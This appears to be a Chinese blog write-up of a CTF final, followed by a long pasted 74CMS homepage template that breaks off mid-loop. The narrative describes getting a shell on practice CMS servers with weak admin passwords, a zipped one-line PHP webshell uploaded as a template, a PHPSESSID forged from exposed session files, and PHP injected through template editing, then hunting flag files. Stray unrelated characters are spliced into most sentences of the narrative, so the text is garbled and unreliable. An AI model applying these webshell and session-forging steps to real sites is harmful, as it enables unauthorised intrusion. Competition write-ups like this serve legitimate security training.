今天折磨了一天感冒和頭痛的身軀。病曾。牍蜂。。寫完倒頭就睡泰涂。鲫竞。。逼蒙。
今天決賽分為:
- 上午的綜合滲透(個(gè)人更覺得是CTF)因?yàn)橹v道理貌似三個(gè)題目服務(wù)器之間是互相不可達(dá)的从绘。。是牢。僵井。。
- 下午的AWD(很不意外 還是只有一題)
上午的綜合滲透是三個(gè)cms妖泄,分別是MetInfo 5.x驹沿、騎士CMS、還有一個(gè)easycms蹈胡。渊季。(版本號(hào)真的不記得了。罚渐。)
首先第一題MetInfo
- cookie處一個(gè)flag
- robots.txt處一個(gè)flag
- 弱密碼admin ---- MetInfo 進(jìn)入后臺(tái)
- 看到有個(gè)模版上傳却汉, 只允許上傳zip等等,后綴限定得很死荷并,發(fā)現(xiàn)他里面的模版都是以很多文件的形式存在合砂,那么可以很合理的猜測(cè)他這里會(huì)有解壓這一個(gè)操作,所以構(gòu)造一個(gè)一句話源织,然后打包成zip上傳模版翩伪,發(fā)現(xiàn)php被解壓出來在templates目錄下,getshell谈息,直接上菜刀缘屹,這是一個(gè)windows的題,Orz這里就一開始有點(diǎn)難辦了侠仇。轻姿。不太懂windows的命令犁珠。
- 在User目錄下的flag4文件夾發(fā)現(xiàn)一個(gè)flag
- 在網(wǎng)站部署目錄下的upload\file里看到一個(gè)flag
- 另外還有一個(gè)忘記在哪找的了。互亮。犁享。是一個(gè)名字為flag5.png的文件,hexdump后發(fā)現(xiàn)flag5
第二題騎士CMS
- 服務(wù)器設(shè)置不當(dāng)導(dǎo)致部分目錄遍歷 (不存在index.php index.html的文件夾 具體apache配置項(xiàng)是Directory的Indexes)
- cookie處一個(gè)flag
- robots.txt處一個(gè)flag //貌似是
- 在遍歷的時(shí)候發(fā)現(xiàn)了PHP的session儲(chǔ)存點(diǎn)豹休,翻看之后看到帶有admin記錄的session值炊昆,果斷document.cookie="PHPSESSID=xxx"偽造一波,成功登錄后臺(tái)
- 在后臺(tái)處發(fā)現(xiàn)了模版編輯威根,是編輯htm文件窑眯,但是里面有很多類似于laravel的blade模版引擎的mustache寫法,也就是{{ }}之類的医窿,猜測(cè)這里是可以直接加入php執(zhí)行的,直接加入
<?php phpinfo();?>
成功執(zhí)行炊林,然后就開始getshell翻翻翻flag了 - apache運(yùn)行用戶叫apache
- 首先在網(wǎng)站部署根目錄下發(fā)現(xiàn)一個(gè)AAAAAAAAflag.txt文件得到一個(gè)flag
- 其次在服務(wù)器根目錄下有一個(gè)/flag文件夾姥卢,雖然是被設(shè)置成了700,但是owner是apache渣聚,直接chmod 777 后進(jìn)入目錄查看.flag.txt文件得到一個(gè)flag
- 最后執(zhí)行find / -name flag的時(shí)候在/var/lib/mysql/處發(fā)現(xiàn)了有一個(gè)flag文件夾独榴,這次owner是mysql并沒有讀權(quán)限,cat /etc/group 的時(shí)候發(fā)現(xiàn)mysql是單獨(dú)一個(gè)組的奕枝,這里想到了提權(quán)棺榔。。隘道。但是沒有怎么操作過症歇。。谭梗。所以放棄了
附上一部分模版源碼:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />{#qishi_pageinfo set="列表名:page,調(diào)用:QS_index"#}
<title>Welcome 74CMS</title>
<meta name="description" content="{#$page.description#}">
<meta name="keywords" content="{#$page.keywords#}">
<meta http-equiv="X-UA-Compatible" content="edge">
<link rel="shortcut icon" href="{#$QISHI.site_dir#}favicon.ico" />
<meta name="author" content="騎士CMS" />
<meta name="copyright" content="74cms.com" />
<link href="{#$QISHI.site_template#}css/common.css" rel="stylesheet" type="text/css" />
<link href="{#$QISHI.site_template#}css/index.css" rel="stylesheet" type="text/css" />
<script src="{#$QISHI.site_template#}js/jquery.js" type="text/javascript" language="javascript"></script>
<script src="{#$QISHI.site_template#}js/index_foucs.js" type="text/javascript" language="javascript"></script>
<script src="{#$QISHI.site_template#}js/jquery.dropDownWidget.js" type="text/javascript" language="javascript"></script>
<script src="{#$QISHI.site_template#}js/jquery.newindex.js" type="text/javascript" language="javascript"></script>
<script src="{#$QISHI.site_template#}js/jquery.lazyload.js" type="text/javascript" language="javascript"></script>
<script src="{#$QISHI.site_template#}js/jquery.autocomplete.js" type="text/javascript" language="javascript"></script>
<script src="{#$QISHI.site_dir#}data/cache_classify.js" type="text/javascript" charset="utf-8"></script>
<script type="text/javascript">
jQuery(document).ready(function($) {
//選項(xiàng)卡切換
$(".n-tab-control>a").each(function(){
$(this).click(function(){
$(this).addClass("select");
$(this).siblings("a").removeClass("select");
var bull_index = $(".n-tab-control>a").index(this);
$(".news-tab-box>ul").eq(bull_index).show().siblings().hide();
})
});
//登錄
$.get('{#$QISHI.site_dir#}plus/ajax_user.php?act=loginform', function(data) {
$("#ajax_login").html(data);
// 選擇登錄方式
var wxrun = '';
$('.loginicon').toggle(function(){
$('#pcLogin').hide();
$('#codeLogin').show();
$('#login-box h1').html('微信登錄');
$(this).attr('title', '用戶名登錄');
$(this).removeClass('wx').addClass('pc');
{#if $QISHI.weixin_apiopen=='1' && $QISHI.weixin_scan_login=='1' && $smarty.session.username==''#}
wxrun = window.setInterval(run, 5000);
function run(){
$.get("{#$QISHI.site_dir#}m/login.php?act=waiting_weixin_login",function(data){
if(data=="1"){
window.location="{#$QISHI.site_dir#}";
}
});
}
{#/if#}
}, function(){
$('#pcLogin').show();
$('#codeLogin').hide();
$('#login-box h1').html('會(huì)員登錄');
$(this).attr('title', '微信登錄');
$(this).removeClass('pc').addClass('wx');
{#if $QISHI.weixin_apiopen=='1' && $QISHI.weixin_scan_login=='1' && $smarty.session.username==''#}
window.clearInterval(wxrun);
{#/if#}
});
});
// 左側(cè)下拉
$.dropDownWidget(".job-sort-wrap");
// 首頁(yè)的一些js
index("{#$QISHI.site_dir#}","{#$QISHI.site_template#}");
// 工作地區(qū)填充數(shù)據(jù)
city_filldata("#city_list", QS_city_parent, QS_city, "#result-list-city", "#aui_outer_city", "#cityForIndexSearch", "#citycategory");
//
$('.floor-item:first').find('.floor-title').css({'margin-top':5});
$(".core-function").live('click', function(event) {
window.location.href = $(this).attr("code");
});
});
</script>
</head>
<body {#if $QISHI.body_bgimg#}style="background:url({#$QISHI.site_domain#}{#$QISHI.site_dir#}data/{#$QISHI.updir_images#}/{#$QISHI.body_bgimg#}) repeat-x center 38px;"{#/if#}>
{#include file="header.htm"#}
<!-- 主體 -->
<div class="container-index">
<div class="complex-main clearfix">
<div class="complex-left f-left">
<div class="job-sort-wrap">
<div class="job-sort-control">全部職位分類<i class="sotr-icon"></i></div>
<div class="job-sort-list"></div>
<div class="leftmenu_box"></div>
</div>
<div class="bolck-nav clearfix">
<a class="b-nav-item f-left" href="{#$QISHI.site_dir#}jobs" target="_blank">
<i class="b-nav-icon icon1"></i>
<p>找工作</p>
</a>
<a class="b-nav-item f-left" href="{#$QISHI.site_dir#}resume" target="_blank">
<i class="b-nav-icon icon2"></i>
<p>找人才</p>
</a>
<a class="b-nav-item f-left" href="{#$QISHI.site_dir#}user/company/company_jobs.php?act=addjobs" target="_blank">
<i class="b-nav-icon icon9"></i>
<p>發(fā)職位</p>
</a>
<a class="b-nav-item f-left" href="{#$QISHI.site_dir#}user/personal/personal_resume.php?act=make1" target="_blank">
<i class="b-nav-icon icon4"></i>
<p>創(chuàng)簡(jiǎn)歷</p>
</a>
<a class="b-nav-item f-left" href="{#"QS_simplelist"|qishi_url#}" target="_blank">
<i class="b-nav-icon icon5"></i>
<p>微商圈</p>
</a>
<a class="b-nav-item f-left" href="{#"QS_hrtoolsindex"|qishi_url#}" target="_blank">
<i class="b-nav-icon icon6"></i>
<p>HR工具</p>
</a>
</div>
<div class="news-tab">
<div class="n-tab-control clearfix">
<a href="javascript:;" class="f-left tab-ctrl select">公告</a>
<a href="javascript:;" class="f-left tab-ctrl">資訊</a>
<a href="javascript:;" class="f-left tab-ctrl">幫助</a>
</div>
<div class="news-tab-box">
<!-- 公告 -->
<ul>
{#qishi_notice_list set="列表名:notice,顯示數(shù)目:9,標(biāo)題長(zhǎng)度:12,分類:1,填補(bǔ)字符:..."#}
{#foreach from=$notice item=list#}
<li><i class="tab-icon"></i><a href="{#$list.url#}" target="_blank" title="{#$list.title_#}" class="underline">{#$list.title#}</a></li>
{#/foreach#}
</ul>
<!-- 資訊 -->
<ul style="display: none;">
{#qishi_news_list set="列表名:news,顯示數(shù)目:9,標(biāo)題長(zhǎng)度:12,分類:1,填補(bǔ)字符:...,排序:id>desc"#}
{#foreach from=$news item=list#}
<li><i class="tab-icon"></i><a href="{#$list.url#}" target="_blank" title="{#$list.title_#}" class="underline">{#$list.title#}</a></li>
{#/foreach#}
</ul>
<!-- 幫助 -->
<ul style="display: none;">
{#qishi_help_list set="列表名:help,顯示數(shù)目:9,標(biāo)題長(zhǎng)度:12,填補(bǔ)字符:..."#}
{#foreach from=$help item=list#}
<li><i class="tab-icon"></i><a href="{#$list.url#}" target="_blank" title="{#$list.title_#}" class="underline">{#$list.title#}</a></li>
{#/foreach#}
</ul>
</div>
</div>
</div>
<div class="complex-center f-left">
<!-- 搜索 -->
<div class="search-wrap clearfix">
<div class="search-box f-left">
<div class="search-type f-left">
<div title="找工作" code="QS_jobslist" data="請(qǐng)輸入職位名稱或企業(yè)名稱" class="search-type-show"><span>找工作</span><i class="search-icon"></i></div>
<div title="找人才" code="QS_resumelist" data="請(qǐng)輸入簡(jiǎn)歷關(guān)鍵字" class="search-type-drop"><a href="javascript:;">找人才</a></div>
</div>
<div class="search-text f-left">
<input type="text" name="keyForIndexSearch" id="keyForIndexSearch" placeholder="請(qǐng)輸入職位名稱或企業(yè)名稱" />
</div>
</div>
<div class="search-box f-left">
<div class="search-area-box"><input type="text" name="cityForIndexSearch" id="cityForIndexSearch" placeholder="請(qǐng)輸入工作地區(qū)" /></div>
</div>
<div class="search-submit f-left"><input type="button" name="btnForIndexSearch" id="btnForIndexSearch" code="QS_jobslist" value="搜索" class="search-submit" /></div>
<input type="hidden" name="citycategory" id="citycategory" value="">
<!-- 工作地區(qū)彈出框 -->
<div class="aui_outer" id="aui_outer_city">
<table class="aui_border">
<tbody>
<tr>
<td class="aui_c">
<div class="aui_inner">
<table class="aui_dialog">
<tbody>
<tr>
<td class="aui_main">
<div class="aui_content" style="padding: 0px;">
<div class="LocalDataMultiC" style="width:623px;">
<div class="selector-header"><span class="selector-title">選擇地區(qū)</span><div></div><span id="ct-selector-save" class="selector-save">確定</span><span class="selector-close">X</span><div class="clear"></div></div>
<div class="data-row-head"><div class="data-row"><div class="data-row-side data-row-side-c">最多選 <strong class="text-warning">3</strong> 項(xiàng) 已選 <strong id="arscity" class="text-warning">0</strong> 項(xiàng)</div><div id="result-list-city" class="result-list data-row-side-ra"></div></div><div class="cla"></div></div>
<div class="data-row-list data-row-main" id="city_list">
<!-- 列表內(nèi)容 -->
</div>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</td>
</tr>
</tbody>
</table>
</div>
<!-- 工作地區(qū)彈出框 End-->
</div>
<!-- 搜索結(jié)束 -->
<div class="swipe-wrap">
{#qishi_ad set="顯示數(shù)目:6,調(diào)用名稱:QS_indexfocus,列表名:ad"#}
<div id="playBox">
<div class="pre"></div>
<div class="next"></div>
<div class="smalltitle">
<ul>
{#section loop=$ad name=list#}
<li {#if $smarty.section.list.first#}class="thistitle"{#/if#}></li>
{#/section#}
</ul>
</div>
<ul class="oUlplay">
{#foreach from=$ad item=list#}
<li><a href="{#$list.img_url#}" target="_blank">![]({#$list.img_path#})</a></li>
{#/foreach#}
</ul>
</div>
</div>
<div class="block-ad-wrap clearfix lazyload">
{#qishi_ad set="顯示數(shù)目:6,調(diào)用名稱:QS_indexrecommend,列表名:ad"#}
{#if $ad#}
{#foreach from=$ad item=list#}
{#if $list.img_uid>0#}
<div class="block-ad-item f-left">
<div class="block-ad-logo"><a href="{#$list.img_url#}" target="_blank">![]({#$QISHI.site_template#}images/index/84.gif)</a></div>
<div class="block-ad-info">
<h3><a href="{#$list.company_url#}" target="_blank">{#$list.companyname#}</a></h3>
<p><a href="{#$list.jobs.0.jobs_url#}" target="_blank">{#$list.jobs.0.jobs_name#}</a></p>
</div>
</div>
{#else#}
<div class="block-ad-item f-left">
<a href="{#$list.img_url#}" target="_blank">
![]({#$QISHI.site_template#}images/index/84.jpg)
</a>
</div>
{#/if#}
{#/foreach#}
{#/if#}
</div>
</div>
<div class="complex-right f-left">
<div class="login-block" id="ajax_login">
<h4>會(huì)員登錄</h4>
<div class="login-wrap">
<div class="login-item">
<div class="login-text-box clearfix"><i class="login-icon user f-left"></i><div class="login-input f-left"><input type="text" name="" id="" placeholder="郵箱/手機(jī)號(hào)/用戶名" /></div></div>
</div>
<div class="login-item">
<div class="login-text-box clearfix"><i class="login-icon pass f-left"></i><div class="login-input f-left"><input type="password" name="" id="" placeholder="請(qǐng)輸入密碼" /></div></div>
</div>
<div class="login-item clearfix">
<label class="auto-login f-left"><input type="checkbox" name="" id="" />自動(dòng)登錄</label>
<a href="" class="forget underline f-right">忘記密碼忘晤?</a>
</div>
<div class="login-item clearfix">
<div class="login-btn-box f-left"><input type="button" value="立即登錄" class="index-login-btn" /></div>
<div class="f-left"><input type="button" value="免費(fèi)注冊(cè)" class="index-reg-btn" /></div>
</div>
<div class="third-login clearfix">
<span class="f-left">其他賬戶登錄:</span>
<a href="" class="third-icon qq f-left"></a><a href="" class="third-icon sina f-left"></a><a href="" class="third-icon taobao f-left"></a>
</div>
</div>
</div>
<div class="urgent-block" id="emergencybox">
<div class="urgent-title clearfix">
<h4 class="f-left">緊急招聘</h4>
<a href="{#"QS_jobs"|qishi_url#}" class="underline f-right" target="_blank">更多>></a>
</div>
<ul class="urgent-list">
{#qishi_jobs_list set="列表名:jobs,顯示數(shù)目:10,職位名長(zhǎng)度:12,企業(yè)名長(zhǎng)度:12,緊急招聘:1,排序:refreshtime>desc"#}
{#foreach from=$jobs item=list#}
<li class="clearfix"><a href="{#$list.company_url#}" class="u-com f-left underline" target="_blank">{#$list.companyname#}</a><a href="{#$list.jobs_url#}" class="u-job f-left underline" title="{#$list.jobs_name_#}" target="_blank">{#$list.jobs_name#}</a></li>
{#/foreach#}
</ul>
</div>
</div>
</div>
<!-- 廣告位集中區(qū)域 -->
<div class="ad-area">
<!-- 1198*58 廣告 -->
{#qishi_ad set="顯示數(shù)目:3,調(diào)用名稱:QS_indextopimg,列表名:ad,文字長(zhǎng)度:12"#}
{#if $ad#}
{#foreach from=$ad item=list#}
<div class="ad-row clearfix lazyload">
<div class="ad-item ad-full f-left"><a href="{#$list.img_url#}" target="_blank">![]({#$QISHI.site_template#}images/index/84.gif)</a></div>
</div>
{#/foreach#}
{#/if#}
<!-- 392*58 廣告 格子廣告-->
{#qishi_ad set="顯示數(shù)目:6,調(diào)用名稱:QS_indexcentreimg,列表名:ad,文字長(zhǎng)度:12"#}
{#if $ad#}
<div class="ad-row clearfix lazyload">
{#foreach from=$ad item=list#}
<div class="ad-item ad-31 f-left comimgtip">
<a href="{#$list.img_url#}" target="_blank">![]({#$QISHI.site_template#}images/index/84.gif)</a>
{#if $list.jobs#}
<!-- 鼠標(biāo)至上顯示 -->
<div class="ad-more-info info31" style="display: none;">
<div class="ad-placeholder"></div>
<ul class="ad-job-list">
{#foreach from=$list.jobs item=jobs_li#}
<li class="clearfix"><div class="jobname f-left"><a href="{#$jobs_li.jobs_url#}" class="underline" target="_blank">{#$jobs_li.jobs_name#}</a></div><div class="jobpay f-left"><span>{#$jobs_li.wage_cn#}</span></div><div class="jobnarea f-left">{#$jobs_li.district_cn#}</div></li>
{#/foreach#}
</ul>
<div class="ad-com-info">
<div class="companyname"><a href="{#$list.company_url#}" class="underline" target="_blank">{#$list.companyname#}</a></div>
<p>{#$list.briefly#}</p>
</div>
<a href="{#$list.company_url#}" class="ad-more" target="_blank">查看更多內(nèi)容>></a>
</div>
{#/if#}
</div>
{#/foreach#}
</div>
{#/if#}
<!-- 230x58 廣告 格子廣告-->
{#qishi_ad set="顯示數(shù)目:10,調(diào)用名稱:QS_indexcentreimg_230x58,列表名:ad,文字長(zhǎng)度:12"#}
{#if $ad#}
<div class="ad-row a23058d clearfix lazyload">
{#foreach from=$ad item=list#}
<div class="ad-item ad-51 f-left comimgtip">
<a href="{#$list.img_url#}" target="_blank">![]({#$QISHI.site_template#}images/index/84.gif)</a>
{#if $list.jobs#}
<!-- 鼠標(biāo)至上顯示 -->
<div class="ad-more-info info51" style="display: none;">
<div class="ad-placeholder"></div>
<ul class="ad-job-list">
{#foreach from=$list.jobs item=jobs_li#}
<li class="clearfix"><div class="jobname f-left"><a href="{#$jobs_li.jobs_url#}" class="underline" target="_blank">{#$jobs_li.jobs_name#}</a></div><div class="jobpay f-left"><span>{#$jobs_li.wage_cn#}</span></div></li>
{#/foreach#}
</ul>
<div class="ad-com-info ad-com-info-w">
<div class="companyname"><a href="{#$list.company_url#}" class="underline" target="_blank">{#$list.companyname#}</a></div>
<p>{#$list.briefly#}</p>
</div>
<a href="{#$list.company_url#}" class="ad-more" target="_blank">查看更多內(nèi)容>></a>
</div>
{#/if#}
</div>
{#/foreach#}
</div>
{#/if#}
</div>
<!-- 廣告位集中區(qū)域結(jié)束 -->
<!-- 列表-推薦職位 -->
<div class="index-data-wrap index-data-wrap-i7">
<div class="blue-line"></div>
<div class="data-title-box clearfix">
<h4 class="f-left">推薦職位<span>Recommended Job</span></h4>
<a href="{#"QS_helplist,id:10"|qishi_url#}" class="f-right underline" target="_blank">我是招聘單位,我想出現(xiàn)在這里</a>
</div>
<div class="famous-list clearfix">
{#qishi_companyjobs_list set="列表名:comjob_recommend,顯示數(shù)目:12,顯示職位:3,推薦:1,統(tǒng)計(jì)職位:1"#}
{#foreach from=$comjob_recommend item=list#}
<div class="famous-items f-left">
<i class="fc-icon"></i>
<div class="famous-com comtip">
<a href="{#$list.company_url#}" class="underline" target="_balnk">{#$list.companyname#}{#if $QISHI.operation_mode>="2" && $list.setmeal_id>1 #} ![]({#$QISHI.site_dir#}data/setmealimg/{#$list.setmeal_id#}.gif){#/if#}</a>
<div class="famous-more-info" style="display:none;">
<i class="fmi-icon"></i>
<div class="fmi-title">招聘崗位</div>
<ul class="fmi-list">
{#qishi_jobs_list set="列表名:com_jobs_all,顯示數(shù)目:3,會(huì)員UID:$list.uid"#}
{#foreach from=$com_jobs_all item=job_li#}
<li class="clearfix">
<div class="fmi-jobname f-left"><a href="{#$job_li.jobs_url#}" class="underline" target="_balnk">{#$job_li.jobs_name#}</a></div><div class="fmi-time f-left"><span>{#$job_li.refreshtime_cn#}</span></div>
</li>
{#/foreach#}
</ul>
<p>該企業(yè)共有{#$list.jobs_num#}個(gè)職位激捏,<a href="{#"QS_companyjobs,id:$list.company_id"|qishi_url#}" target="_balnk" class="underline">查看全部</a></p>
</div>
</div>
<div class="famous-job">
{#foreach from=$list.jobs item=jobs_li#}
<span><a href="{#$jobs_li.jobs_url#}" class="underline" target="_balnk">{#$jobs_li.jobs_name#}</a></span>
{#/foreach#}
</div>
</div>
{#/foreach#}
</div>
</div>
<!-- 列表-名企招聘結(jié)束 -->
<!-- 1198*58 廣告 -->
{#qishi_ad set="顯示數(shù)目:3,調(diào)用名稱:QS_indexcenter,列表名:ad,文字長(zhǎng)度:12"#}
{#if $ad#}
<div class="ad-area">
{#foreach from=$ad item=list#}
<div class="ad-row clearfix lazyload">
<div class="ad-item ad-full f-left"><a href="{#$list.img_url#}" target="_blank">![]({#$QISHI.site_template#}images/index/84.gif)</a></div>
</div>
{#/foreach#}
</div>
{#/if#}
<!-- 列表-最新職位 -->
<div class="index-data-wrap">
<div class="blue-line"></div>
<div class="data-title-box clearfix">
<h4 class="f-left">最新職位<span>Latest Job</span></h4>
<a href="{#"QS_jobslist"|qishi_url#}" class="f-right underline" target="_blank">更多>></a>
</div>
<div class="newest-list clearfix">
{#qishi_companyjobs_list set="列表名:jobs,顯示數(shù)目:40,職位名長(zhǎng)度:12,顯示職位:1,企業(yè)名長(zhǎng)度:12,排序:rtime>desc"#}
{#foreach from=$jobs item=list#}
<div class="newest-items f-left">
<i class="nc-icon"></i>
<a href="{#$list.company_url#}" class="newest-com underline" target="_blank">{#$list.companyname#}</a>
{#foreach from=$list.jobs item=li#}
<a href="{#$li.jobs_url#}" class="newest-job underline" target="_blank">{#$li.jobs_name#}</a>
{#/foreach#}
</div>
{#/foreach#}
</div>
</div>
<!-- 列表-最新職位結(jié)束 -->
<!-- 1198*58 廣告 -->
{#qishi_ad set="顯示數(shù)目:3,調(diào)用名稱:QS_indexfootbanner,列表名:ad,文字長(zhǎng)度:12"#}
{#if $ad#}
<div class="ad-area">
{#foreach from=$ad item=list#}
<div class="ad-row clearfix lazyload">
<div class="ad-item ad-full f-left"><a href="{#$list.img_url#}" target="_blank">![]({#$QISHI.site_template#}images/index/84.gif)</a></div>
</div>
{#/foreach#}
</div>
{#/if#}
<!-- 列表-照片簡(jiǎn)歷 -->
<div class="index-data-wrap">
<div class="blue-line"></div>
<div class="data-title-box clearfix">
<h4 class="f-left">照片簡(jiǎn)歷<span>Photo Resume</span></h4>
<a href="{#"QS_resumelist,photo:1"|qishi_url#}" class="f-right underline" target="_blank">更多>></a>
</div>
<div class="photo-list clearfix">
{#qishi_resume_list set="列表名:resume,顯示數(shù)目:7,照片:1,意向職位長(zhǎng)度:14,填補(bǔ)字符:...,排序:rtime>desc"#}
{#foreach from=$resume item=list#}
<div class="photo-items f-left">
<div class="avater-box">
<div class="avater"><a href="{#$list.resume_url#}" target="_blank">![]({#$list.photosrc#})</a></div>
<p><a href="{#$list.resume_url#}" target="_blank" class="underline">{#$list.fullname#}</a></p>
</div>
<div class="photo-info">
<p>{#$list.education_cn#},{#$list.experience_cn#}</p>
<p>{#$list.intention_jobs#}</p>
</div>
</div>
{#/foreach#}
</div>
</div>
<!-- 列表-照片簡(jiǎn)歷結(jié)束 -->
<!-- 列表-職位導(dǎo)航 -->
<div class="index-data-wrap">
<div class="blue-line"></div>
<div class="data-title-box clearfix">
<h4 class="f-left">職位導(dǎo)航<span>Jobs Navigation</span></h4>
</div>
<div class="job-build">
<!-- 樓層1 -->
<div class="floor-item">
<div class="floor-title"><em>1F</em><span>{#"QS_jobs,76"|qishi_categoryname#} · {#"QS_jobs,77"|qishi_categoryname#}</span></div>
<div class="floor-box clearfix">
<!-- 分類 -->
<div class="floor-sort f-left">
{#qishi_get_classify set="列表名:subcate,類型:QS_jobs_floor,顯示數(shù)目:20,id:76_77"#}
{#foreach from=$subcate item=list#}
<a href="{#"QS_jobslist,jobcategory:"|cat:74|cat:"."|cat:$list.parentid|cat:"."|cat:$list.id|qishi_url#}" class="f-sort-item f-left" target="_blank">{#$list.categoryname#}</a>
{#/foreach#}
</div>
<!-- 職位 -->
<div class="floor-jobs f-left">
{#qishi_companyjobs_list set="列表名:comjobs,顯示數(shù)目:10,顯示職位:3,職位分類:76_77"#}
{#foreach from=$comjobs item=list#}
<div class="f-job-row">
<a href="{#$list.company_url#}" class="f-job-com underline" target="_blank">{#$list.companyname#}</a>
{#foreach from=$list.jobs item=li#}
<a href="{#$li.jobs_url#}" class="f-job-name underline" target="_blank">{#$li.jobs_name#}</a>
{#/foreach#}
</div>
{#/foreach#}
</div>
<!-- 廣告 樓層廣告1 -->
<div class="floor-ad-box f-left lazyload">
{#qishi_ad set="顯示數(shù)目:4,調(diào)用名稱:QS_floor_img1,列表名:ad,文字長(zhǎng)度:12"#}
{#if $ad#}
{#foreach from=$ad item=list#}
<div class="floor-ad"><a href="{#$list.img_url#}" target="_blank">![]({#$QISHI.site_template#}images/index/84.gif)</a></div>
{#/foreach#}
{#/if#}
</div>
</div>
</div>
<!-- 樓層 2 -->
<div class="floor-item">
<div class="floor-title"><em>2F</em><span>{#"QS_jobs,3"|qishi_categoryname#} · {#"QS_jobs,5"|qishi_categoryname#} · {#"QS_jobs,6"|qishi_categoryname#}</span></div>
<div class="floor-box clearfix">
<!-- 分類 -->
<div class="floor-sort f-left">
{#qishi_get_classify set="列表名:subcate,類型:QS_jobs_floor,顯示數(shù)目:20,id:3_5_6"#}
{#foreach from=$subcate item=list#}
<a href="{#"QS_jobslist,jobcategory:"|cat:1|cat:"."|cat:$list.parentid|cat:"."|cat:$list.id|qishi_url#}" class="f-sort-item f-left" target="_blank">{#$list.categoryname#}</a>
{#/foreach#}
</div>
<!-- 職位 -->
<div class="floor-jobs f-left">
{#qishi_companyjobs_list set="列表名:comjobs,顯示數(shù)目:10,顯示職位:3,職位分類:3_5_6"#}
{#foreach from=$comjobs item=list#}
<div class="f-job-row">
<a href="{#$list.company_url#}" class="f-job-com underline" target="_blank">{#$list.companyname#}</a>
{#foreach from=$list.jobs item=li#}
<a href="{#$li.jobs_url#}" class="f-job-name underline" target="_blank">{#$li.jobs_name#}</a>
{#/foreach#}
</div>
{#/foreach#}
</div>
<!-- 廣告 樓層廣告1 -->
<div class="floor-ad-box f-left lazyload">
{#qishi_ad set="顯示數(shù)目:4,調(diào)用名稱:QS_floor_img2,列表名:ad,文字長(zhǎng)度:12"#}
{#if $ad#}
{#foreach from=$ad item=list#}
<div class="floor-ad"><a href="{#$list.img_url#}" target="_blank">![]({#$QISHI.site_template#}images/index/84.gif)</a></div>
{#/foreach#}
{#/if#}
</div>
</div>
</div>
<!-- 樓層 3 -->
<div class="floor-item">
<div class="floor-title"><em>3F</em><span>{#"QS_jobs,117"|qishi_categoryname#} · {#"QS_jobs,120"|qishi_categoryname#} · {#"QS_jobs,121"|qishi_categoryname#}</span></div>
<div class="floor-box clearfix">
<!-- 分類 -->
<div class="floor-sort f-left">
{#qishi_get_classify set="列表名:subcate,類型:QS_jobs_floor,顯示數(shù)目:20,id:117_120_121"#}
{#foreach from=$subcate item=list#}
<a href="{#"QS_jobslist,jobcategory:"|cat:116|cat:"."|cat:$list.parentid|cat:"."|cat:$list.id|qishi_url#}" class="f-sort-item f-left" target="_blank">{#$list.categoryname#}</a>
{#/foreach#}
</div>
<!-- 職位 -->
<div class="floor-jobs f-left">
{#qishi_companyjobs_list set="列表名:comjobs,顯示數(shù)目:10,顯示職位:3,職位分類:117_120_121"#}
{#foreach from=$comjobs item=list#}
<div class="f-job-row">
<a href="{#$list.company_url#}" class="f-job-com underline" target="_blank">{#$list.companyname#}</a>
{#foreach from=$list.jobs item=li#}
<a href="{#$li.jobs_url#}" class="f-job-name underline" target="_blank">{#$li.jobs_name#}</a>
{#/foreach#}
</div>
{#/foreach#}
</div>
<!-- 廣告 樓層廣告1 -->
<div class="floor-ad-box f-left lazyload">
{#qishi_ad set="顯示數(shù)目:4,調(diào)用名稱:QS_floor_img3,列表名:ad,文字長(zhǎng)度:12"#}
{#if $ad#}
{#foreach from=$ad item=list#}
<div class="floor-ad"><a href="{#$list.img_url#}" target="_blank">![]({#$QISHI.site_template#}images/index/84.gif)</a></div>
{#/foreach#}
{#/if#}
</div>
</div>
</div>
<!-- 樓層 4 -->
<div class="floor-item">
<div class="floor-title"><em>4F</em><span>{#"QS_jobs,97"|qishi_categoryname#} · {#"QS_jobs,98"|qishi_categoryname#} · {#"QS_jobs,99"|qishi_categoryname#}</span></div>
<div class="floor-box clearfix">
<!-- 分類 -->
<div class="floor-sort f-left">
{#qishi_get_classify set="列表名:subcate,類型:QS_jobs_floor,顯示數(shù)目:20,id:97_98_99"#}
{#foreach from=$subcate item=list#}
<a href="{#"QS_jobslist,jobcategory:"|cat:96|cat:"."|cat:$list.parentid|cat:"."|cat:$list.id|qishi_url#}" class="f-sort-item f-left" target="_blank">{#$list.categoryname#}</a>
{#/foreach#}
</div>
<!-- 職位 -->
<div class="floor-jobs f-left">
{#qishi_companyjobs_list set="列表名:comjobs,顯示數(shù)目:10,顯示職位:3,職位分類:97_98_99"#}
{#foreach from=$comjobs item=list#}
<div class="f-job-row">
<a href="{#$list.company_url#}" class="f-job-com underline" target="_blank">{#$list.companyname#}</a>
{#foreach from=$list.jobs item=li#}
<a href="{#$li.jobs_url#}" class="f-job-name underline" target="_blank">{#$li.jobs_name#}</a>
{#/foreach#}
</div>
{#/foreach#}
</div>
<!-- 廣告 樓層廣告1 -->
<div class="floor-ad-box f-left lazyload">
{#qishi_ad set="顯示數(shù)目:4,調(diào)用名稱:QS_floor_img4,列表名:ad,文字長(zhǎng)度:12"#}
{#if $ad#}
{#foreach from=$ad item=list#}
<div class="floor-ad"><a href="{#$list.img_url#}" target="_blank">![]({#$QISHI.site_template#}images/index/84.gif)</a></div>
{#/foreach#}
{#/if#}
</div>
</div>
</div>
<!-- 樓層 5 -->
<div class="floor-item">
<div class="floor-title"><em>5F</em><span>{#"QS_jobs,50"|qishi_categoryname#} · {#"QS_jobs,51"|qishi_categoryname#} · {#"QS_jobs,52"|qishi_categoryname#}</span></div>
<div class="floor-box clearfix">
<!-- 分類 -->
<div class="floor-sort f-left">
{#qishi_get_classify set="列表名:subcate,類型:QS_jobs_floor,顯示數(shù)目:20,id:50_51_52"#}
{#foreach from=$subcate item=list#}
<a href="{#"QS_jobslist,jobcategory:"|cat:49|cat:"."|cat:$list.parentid|cat:"."|cat:$list.id|qishi_url#}" class="f-sort-item f-left" target="_blank">{#$list.categoryname#}</a>
{#/foreach#}
</div>
<!-- 職位 -->
<div class="floor-jobs f-left">
{#qishi_companyjobs_list set="列表名:comjobs,顯示數(shù)目:10,顯示職位:3,職位分類:50_51_52"#}
{#foreach from=$comjobs item=list#}
<div class="f-job-row">
<a href="{#$list.company_url#}" class="f-job-com underline" target="_blank">{#$list.companyname#}</a>
{#foreach from=$list.jobs item=li#}
